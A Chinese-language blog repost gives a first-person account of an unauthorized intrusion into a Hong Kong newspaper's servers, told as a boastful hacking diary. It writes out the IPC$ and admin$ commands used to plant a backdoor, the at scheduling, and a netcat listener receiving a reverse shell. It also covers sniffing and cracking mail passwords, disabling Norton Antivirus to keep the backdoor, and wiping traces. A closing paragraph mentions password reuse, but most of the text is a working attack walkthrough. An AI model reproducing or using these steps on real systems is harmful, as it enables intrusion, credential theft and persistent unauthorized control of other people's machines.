欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

一次透过SNIFF有目的性的入侵

程序员文章站 2022-03-19 13:59:08
一次透过SNIFF有目的性的入侵 所用武器:流光,SUPERSCAN3,HDOOR,NETCAT,3389客户端,X-SNIFF 宿舍装了ADSL,我疯狂地在网上看电影和在QQ里泡MM(也可能是恐龙吧 :( ... 08-10-08...
一次透过sniff有目的性的入侵

所用武器:流光,superscan3,hdoor,netcat,3389客户端,x-sniff 宿舍装了adsl,我疯狂地在网上看电影和在qq里泡mm(也可能是恐龙吧 :( )。网络入侵和安全方面的学习已经荒废了好一段时间 :( ,忽然觉得良心发现,是时候回到学习的位置上了,先找些机器入侵热身一下吧!:) 刚好正在浏览一个香港某日报的网站www.target.com.hk(名字已改),就那你开刀吧! 首先ping一下对方的主机拿到ip地址为202.2.*.1,然后架起superscan3对目标进行初探,得到以下结果: * 202.2.*.1 www1
|___ 25 simple mail transfer
|___ 220 ok rsproxyserver ready..
|___ 80 world wide web http
|___ http/1.1 200 ok..server: microsoft-iis/5.0..content-location: http://202.2.*.1/default.htm..date: fri, 03 jan 2003 17:24:28 gm
|___ 110 post office protocol - version 3
|___ 135 dce endpoint resolution
|___ 139 netbios session service
|___ 389 lightweight directory access protocol
|___ 445 windows-nb
|___ 1433 microsoft-sql-server
|___ 3389 windows--t 看来可下手的地方有四个:80,139,1433,3389。先看看有没有输入法漏洞吧。登陆一看,失望!只有e文输入法。心想也是,一个服务器难道还需要什么中文输入法让人上icq吗?3389没戏!跟着用流光的高级扫描功能针对cgi/asp,iis,ipc,plugins扫描一下,希望对方是个笨管理员,没有为机器打补丁有null.printer等致命的漏洞或者存在弱口令。结果再一次失望,没有可以让我利用的漏洞!看来网管还挺尽责的(tnnd)。剩下1433了,愿主保佑吧!用sql2等对目标进行溢出,结果还是无功而返。难道真的要让我试分析他的网页cgi结构,找突破口吗?我可没有那么高手和没那个耐力!有点沮丧……有点想放弃……郁闷ing…… 一间报社不可能就一台服务器吧!不管那么多,用流光的简单探测模式扫他的c类网。结果还真的有一点点惊喜!202.2.*.18的administrator竟然是空口令!:) 不管三七二十一控制了他再说! microsoft windows 2000 [version 5.00.2195]
(c) 版权所有 1985-2000 microsoft corp. d:\>net use \\202.2.*.18\ipc$ "" /user:"administrator"
命令成功完成。(可能你会问为什么不用流光的种植者呢?流光用多了会使人变懒!还是用命令有成就感)
d:\hack\bd\hdoor>copy nhdoor.exe \\202.2.*.18\admin$\system32\nhdoor.exe
已复制 1 个文件。
d:\hack\bd\hdoor>net time \\202.2.*.18
\\202.2.*.18 的当前时间是 2002/12/21 上午 02:05 命令成功完成。
d:\hack\bd\hdoor>at \\202.2.*.18 02:07 nhdoor.exe
新加了一项作业,其作业 id = 1
d:\hack\bd\hdoor>net use \\202.2.*.18 /del
\\202.2.*.18 已经删除。
现在剩下的只有等待了………………
然后开两个命令提示符,一个用nc监听53端口等目标进行反向连接:d:\hack\nc>nc -l -vv -p 53 ;另一个则用来激活目标主动连过来:d:\>ping 202.2.83.*.18 -l 101 -n 1
yahoo!有反应了 d:\hack\nc>nc -l -vv -p 53
listening on [any] 53 ...
warning: forward host lookup failed for skymail_mx3: h_errno 11001: host_not_fou
nd
connect to [218.15.1.157] from skymail_mx3 [202.2.*.18] 1352: host_not_found -> huc hdoor control password: ******** (密码当然不能看!) -> welcome and have a good luck! :) ============================== ping backdoor v0.41 ============================
=============== code by lion. welcome to http://www.cnhonker.com ============== <c:\winnt\system32@skymail_mx3># 拿到shell后当然是在机器里参观一下,收集需要的信息。经过一番窥探以后,确定这是一台邮件服务器和secondary wins server。跟着进入苦思阶段,要怎样才能把之前的202.2.*.1拿下来呢?sniff!没错!这是台邮件服务器,嗅探进出的数据,把登陆者的帐户和密码过滤出来,希望202.2.*.1的管理员会通过这邮件服务器收发邮件。马上用net命令把xsniff上传上去,运行xsniff -pass -hide -log pass.log。现在只有等待了,擦掉脚印走人,睡觉! 十几天过去了,登陆上202.2.*.18把pass.log拿下来。呵呵,收集到的信息还挺多的!:) 但不知道有没有收集到202.2.*.1的管理员的信息。我把收集到的邮件帐号、帐户名、密码做成了一部字典,然后用流光对准202.2.*.1的139跑。我的努力果然没白费,密码拿到了,是 b3jhy2xl 幸亏我当时没有头脑发热去对他暴力破解,不然…… :( 最后当然是放后门,保护胜利成果。
microsoft windows 2000 [version 5.00.2195]
(c) 版权所有 1985-2000 microsoft corp. d:\>net use \\202.2.*.1\ipc$ "b3jhy2xl" /user:"administrator"
命令成功完成。
d:\hack\bd\hdoor>copy nhdoor.exe \\202.2.*.1\admin$\system32\nhdoor.exe
已复制 1 个文件。
d:\hack\bd\hdoor>net time \\202.2.*.1
\\202.2.*.1 的当前时间是 2003/1/3 上午 01:17 命令成功完成。
d:\hack\bd\hdoor>at \\202.2.*.1 01:19 nhdoor.exe
新加了一项作业,其作业 id = 1
跟着用netcat等待他主动连过来。奇怪!没反应!心想可能是hdoor不行吧,换个icmd后门试试,也不行,telnet不上去!郁闷ing……接着连上他的3389看一下。奇怪!在system32里面没有我刚才所复制的文件,但刚才明明提示说已复制啊!然后我用net use k: \\202.2.*.1\admin$\system32把system32影射为k盘,直接进行复制粘贴,奇怪,明明粘贴过去了,但k盘却没有复制过去的文件,百思不得其解。算了,反正拿到administrator的密码,算完成任务了。接着又连上3389,在他那里四处逛逛,看有什么好玩的,打开事件查看器看了一下,在应用程序日记里最前有几条错误,来源是norton antivirus,引起了我的注意!打开描述一看,是说发现了病毒并删除掉,而文件名就是我copy的那些!看来迷团解开了,我马上在服务管理里把norton antivirus client停掉,然后像之前那样把nhdoor复制过去,ok!我的nhdoor在system32里面出现了!:)
最后当然是启动后门,擦脚印(可恨的是norton里的病毒日记不知道怎样删掉,到时候被管理员发现就惨啦!) 事后总结: 这一次入侵,觉得应该还有其他方法对目标机器进行入侵(等我实验成功后再写出来)。这次入侵的关键突破口就是管理员的邮箱密码与登陆密码相同。对于大多数的人来说凡是需要密码的地方都会用同一个密码,这样是不可取的,这样就会造成城门失火秧及池渔。还有就是在停掉norton antivirus client时,如果对方没有开3389的话,可以自己写一个.bat文件copy过去用at加任务运行,把norton antivirus client停掉,因为
norton只对病毒有效,而.bat是自己写的,当然不是什么病毒啦!